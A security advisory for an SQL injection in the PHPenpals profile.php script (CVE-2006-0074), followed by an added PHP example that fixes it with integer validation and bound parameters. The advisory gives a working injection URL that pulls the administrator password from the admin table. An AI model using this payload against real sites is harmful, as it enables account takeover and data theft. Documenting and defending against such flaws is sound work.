SQL Injection Vulnerability in PHPenpals

Summary

Vulnerability: SQL Injection Vulnerability in PHPenpals
Discovered: 2005.12.29
Last Update: 0 n/a
ID: EV0005
CVE: CVE-2006-0074
Risk Level: medium
Type: SQL Injection
Status: Unpatched
Vendor: Jevontec (http://jevontech.com/)
Vulnerable Software: PHPenpals
Version: 310704
PoC/Exploit: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)

Description

A SQL injection vulnerability was found in the PHPenpals script.

Vulnerable scripts: profile.php

The variable $personalID isn't properly sanitized before being used in a SQL query. An attacker can inject arbitrary SQL code through it and so make any SQL query.

PoC/Exploit

Administrator's password:
http://host/phpenpals/profile.php?personalID=999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,password,14%20from%20admin/*

Solution

Solution for "SQL Injection Vulnerability in PHPenpals" is not available. Check Jevontec website for updates.
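
With no vendor fix available, one way to close this class of bug in a lookup like the one in profile.php is strict integer validation plus a bound parameter. This is an added example, not PHPenpals code or a vendor patch: the `profiles` table, its columns, the function names and the assumption that personalID is a numeric key are all hypothetical.

```php
<?php
declare(strict_types=1);

// Added example, not PHPenpals source. The "profiles" table and its columns
// are assumptions; personalID is assumed to be a numeric key.

/** Accept only a plain positive integer (1..999999999); otherwise null. */
function parsePersonalId($raw): ?int
{
    if (!is_string($raw) || preg_match('/^[1-9][0-9]{0,8}$/D', $raw) !== 1) {
        return null;
    }
    return (int) $raw;
}

/** Look up one profile; the ID is bound as an integer, never concatenated. */
function fetchProfile(PDO $db, $rawId): ?array
{
    $id = parsePersonalId($rawId);
    if ($id === null) {
        return null; // rejected before any SQL is built
    }
    $stmt = $db->prepare('SELECT id, nickname, country FROM profiles WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed in-memory database so the example runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE profiles (id INTEGER PRIMARY KEY, nickname TEXT, country TEXT)');
$db->exec("INSERT INTO profiles VALUES (1, 'alice', 'BY')");

// Constructed inputs: a valid ID, the decoded value from the PoC above,
// and malformed values.
$samples = [
    '1',
    '999 union select 1,2,3,4,5,6,7,8,9,10,11,12,password,14 from admin/*',
    '-1',
    'abc',
    '',
];
foreach ($samples as $raw) {
    $row = fetchProfile($db, $raw);
    printf("%-20.20s => %s\n", $raw, $row !== null ? $row['nickname'] : 'rejected or not found');
}
```

When the same pattern is used with PDO's MySQL driver, also set `PDO::ATTR_EMULATE_PREPARES` to `false` so the parameter is bound by the server rather than interpolated client-side.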